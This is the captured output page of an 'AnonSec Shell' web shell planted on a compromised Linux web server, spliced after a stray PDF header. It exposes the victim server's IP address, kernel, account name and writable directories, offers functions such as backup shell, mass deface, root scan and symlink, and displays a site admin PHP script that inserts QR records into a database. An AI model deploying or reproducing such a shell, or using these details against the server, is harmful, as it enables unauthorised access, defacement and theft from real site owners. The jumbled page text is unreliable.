%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.217.172   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/www/admin/dba/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/www/admin/dba/qr-create.php
<?php
include '../lib/include.php';

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Fetching form inputs
    $category_id = intval($_POST['category_id']);
    $title = $ceha->real_escape_string($_POST['title']);
    $alt_title = $ceha->real_escape_string($_POST['alt_title']);
    $video_url = isset($_POST['video_url']) ? $ceha->real_escape_string($_POST['video_url']) : '';
    $pdf_url = isset($_POST['pdf_url_hidden']) ? $ceha->real_escape_string($_POST['pdf_url_hidden']) : '';

    // Inserting data into tbl_qr
    $query = "INSERT INTO tbl_qr (title, alt_title, video_url, pdf_url, category_id) VALUES ('$title', '$alt_title', '$video_url', '$pdf_url', '$category_id')";

    if ($ceha->query($query) === TRUE) {
        $qr_id = $ceha->insert_id;

        // Handle gallery images
        if (isset($_POST['gallery_images'])) {
            $sequence = 1;
            foreach ($_POST['gallery_images'] as $image_url) {
                $image_url = $ceha->real_escape_string($image_url);
                $ceha->query("INSERT INTO tbl_qr_gallery (qr_id, image_url, sequence) VALUES ($qr_id, '$image_url', $sequence)");
                $sequence++;
            }
        }

        header("Location: ../qr-update.php?id=" . $qr_id); // Redirect after successful insertion
        exit;
    } else {
        echo "Error: " . $query . "<br>" . $ceha->error;
    }
} else {
    echo "Invalid request.";
}
?>

Anon7 - 2022
AnonSec Team